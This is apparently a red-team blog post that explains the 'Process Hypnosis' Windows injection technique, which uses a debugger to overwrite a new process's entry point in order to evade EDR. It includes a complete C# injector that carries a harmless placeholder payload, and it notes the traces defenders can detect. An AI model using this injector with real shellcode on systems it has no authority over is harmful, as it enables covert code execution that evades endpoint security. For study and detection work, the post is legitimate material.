What is Process Hypnosis and how it enables red team trade-craft?
Learn what the Process Hypnosis technique is and how to use it in red team trade-craft.
Tick…tock…tick…tock…tick…tock… you are entering a state of deep sleep. You will now listen to me and do as I say, “You will gift me a PS5”. Now, when I say three, you will wake up. 1…2…3.
2 months later…
Vaow! A brand new PS5. I totally forgot about this one!
Ok. That was a little more dramatic than I wanted it to be, but it makes the point: hypnotize → insert instructions → execute.
This is, in principle, how the Process Hypnosis technique works. It was developed by Carlos Garrido as an alternative way to achieve process injection away from the prying eyes of EDR.
In this technique, the target process is created as a debuggee (with a debug creation flag such as DEBUG_ONLY_THIS_PROCESS), so it starts in a debugged state: every new thread, including the main thread, is held frozen (the hypnotic state) until the debugger answers the debug event raised for it. The process-creation debug event hands the debugger a handle to the process and the start address of its main thread, and while the thread is frozen the debugger can read and write the memory at that address. That access is used to write a red team operator controlled payload over the start address of the main thread. The debugger then detaches without killing the process; the frozen thread is released and the main thread runs the operator's payload instead of the program's own entry code.
What makes this technique unique is that it neither goes through the API sequence EDRs commonly watch for process injection (allocating remote memory with VirtualAllocEx and starting a remote thread with CreateRemoteThread, usually after resolving those functions with GetModuleHandle and GetProcAddress) nor creates the target process in a suspended state (CREATE_SUSPENDED). This gives the technique a certain stealth, since most EDRs are not looking for the artifacts it does leave: a debugger relationship between the two processes and a write into the target's entry point.
The following video demonstrates this technique in my lab.
Red Team Notes
- In technical terms, Process Hypnosis is a technique that hijacks the control flow of a process by leveraging the Windows debugging facilities. The target is created under a debugger, its main thread stays frozen until the debugger lets it go, and the debugger modifies the target's memory directly through the access it already has.
- It does not use VirtualAllocEx or CreateRemoteThread, the APIs on which traditional process injection methods rely.
- This lets the method evade security controls that only monitor for the standard injection pattern.
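The steps described above and summarised in the Red Team Notes, as an added worked example in C# with P/Invoke. This is not Carlos Garrido's C++ PoC nor the Rust PoC linked below; it is illustrative code written for this page. It assumes 64-bit Windows and a 64-bit build (the DEBUG_EVENT layout is the x64 one), uses notepad.exe as a stand-in target, and writes a constructed placeholder payload (a two-byte "jmp $") rather than real shellcode. The class name ProcessHypnosis is mine.

```csharp
// Added example (not the original PoC): a minimal Process Hypnosis-style debugger.
// Assumptions: 64-bit Windows, 64-bit build, notepad.exe target, placeholder payload.
using System;
using System.Runtime.InteropServices;

class ProcessHypnosis
{
    const uint DEBUG_ONLY_THIS_PROCESS = 0x00000002; // debug creation flag, not CREATE_SUSPENDED
    const uint CREATE_PROCESS_DEBUG_EVENT = 3;
    const uint DBG_CONTINUE = 0x00010002;
    const uint INFINITE = 0xFFFFFFFF;

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public uint cb;
        public string lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }

    [StructLayout(LayoutKind.Sequential)]
    struct CREATE_PROCESS_DEBUG_INFO
    {
        public IntPtr hFile, hProcess, hThread, lpBaseOfImage;
        public uint dwDebugInfoFileOffset, nDebugInfoSize;
        public IntPtr lpThreadLocalBase;
        public IntPtr lpStartAddress; // start address of the main thread: the image entry point
        public IntPtr lpImageName;
        public ushort fUnicode;
    }

    // x64 layout: the event union begins at offset 16 and the whole struct is 176 bytes.
    [StructLayout(LayoutKind.Explicit, Size = 176)]
    struct DEBUG_EVENT
    {
        [FieldOffset(0)] public uint dwDebugEventCode;
        [FieldOffset(4)] public uint dwProcessId;
        [FieldOffset(8)] public uint dwThreadId;
        [FieldOffset(16)] public CREATE_PROCESS_DEBUG_INFO CreateProcessInfo;
    }

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool CreateProcess(string lpApplicationName, string lpCommandLine,
        IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles,
        uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WaitForDebugEvent(ref DEBUG_EVENT lpDebugEvent, uint dwMilliseconds);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool ContinueDebugEvent(uint dwProcessId, uint dwThreadId, uint dwContinueStatus);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer,
        UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DebugSetProcessKillOnExit(bool KillOnExit);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DebugActiveProcessStop(uint dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    static void Main(string[] args)
    {
        string target = args.Length > 0 ? args[0] : @"C:\Windows\System32\notepad.exe";
        // Constructed placeholder payload: "jmp $" (EB FE). The main thread spins at its own
        // entry point, which is easy to confirm from a debugger. Real shellcode must be
        // position-independent; it replaces the program's entry code, so the process lives
        // only as long as the payload keeps its thread alive.
        byte[] payload = { 0xEB, 0xFE };

        var si = new STARTUPINFO();
        si.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFO));
        PROCESS_INFORMATION pi;
        // 1. Create the target as a debuggee. The kernel parks its initial thread until the
        //    debugger answers the first debug event: frozen, but never CREATE_SUSPENDED.
        if (!CreateProcess(target, null, IntPtr.Zero, IntPtr.Zero, false,
                           DEBUG_ONLY_THIS_PROCESS, IntPtr.Zero, null, ref si, out pi))
            throw new InvalidOperationException("CreateProcess failed: " + Marshal.GetLastWin32Error());
        // 2. Detaching (or this debugger exiting) must not terminate the debuggee.
        DebugSetProcessKillOnExit(false);

        // 3. The process-creation event carries a process handle and the main thread's start
        //    address, so no OpenProcess, VirtualAllocEx or CreateRemoteThread is needed: the
        //    payload is written over the existing, already executable entry point.
        var evt = new DEBUG_EVENT();
        IntPtr entry = IntPtr.Zero;
        while (entry == IntPtr.Zero && WaitForDebugEvent(ref evt, INFINITE))
        {
            if (evt.dwDebugEventCode != CREATE_PROCESS_DEBUG_EVENT)
            {   // Nothing else should arrive first; pass anything else through untouched.
                ContinueDebugEvent(evt.dwProcessId, evt.dwThreadId, DBG_CONTINUE);
                continue;
            }
            CREATE_PROCESS_DEBUG_INFO info = evt.CreateProcessInfo;
            UIntPtr written;
            if (!WriteProcessMemory(info.hProcess, info.lpStartAddress, payload,
                                    (UIntPtr)(uint)payload.Length, out written))
                throw new InvalidOperationException("WriteProcessMemory failed: " + Marshal.GetLastWin32Error());
            CloseHandle(info.hFile); // the only handle in this event the debugger owns
            entry = info.lpStartAddress;
        }
        if (entry == IntPtr.Zero)
            throw new InvalidOperationException("never received CREATE_PROCESS_DEBUG_EVENT");

        // 4. Detach without ContinueDebugEvent. The kernel releases the parked thread and
        //    clears the debuggee state, the loader runs, and execution reaches the entry
        //    point, which is now the payload.
        if (!DebugActiveProcessStop(pi.dwProcessId))
            throw new InvalidOperationException("DebugActiveProcessStop failed: " + Marshal.GetLastWin32Error());
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        Console.WriteLine("PID {0}: wrote {1} bytes at entry point 0x{2:X}, detached.",
                          pi.dwProcessId, payload.Length, entry.ToInt64());
    }
}
```

Build it as a 64-bit console application and run it with an optional target path. The `Size = 176` and the offset 16 in DEBUG_EVENT are the x64 layout; a 32-bit build needs the x86 values (union at offset 12, 96 bytes in total). Two caveats for operators and defenders alike: the payload runs in place of the program's entry code, so the target only keeps running while the payload does; and the sequence still leaves a visible debugger relationship (a process created with a debug creation flag) plus a cross-process write into the image's entry point, which telemetry that records process-creation flags or WriteProcessMemory targets can surface even though no remote thread is ever created.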
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.
If you want to dive deep into the technical details of how Process Hypnosis works, read the original research published by Carlos Garrido. Carlos has also published a C++ PoC for this technique; there is also a PoC in Rust developed by João Victor.